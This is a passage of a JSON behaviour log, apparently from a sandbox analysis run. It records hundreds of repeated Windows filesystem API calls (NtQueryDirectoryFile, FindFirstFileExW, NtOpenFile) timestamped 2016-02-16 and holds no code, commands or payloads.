"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtOpenFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,264", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,264", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,264", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,274", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,274", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,274", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,274", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,274", "api": "FindFirstFileExW"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:36,274", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,274", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,274", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,274", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,274", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,274", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,314", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,314", "api": "NtQueryDirectoryFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:36,324", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,324", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,324", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,324", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,324", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,324", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,324", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": 
"FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": 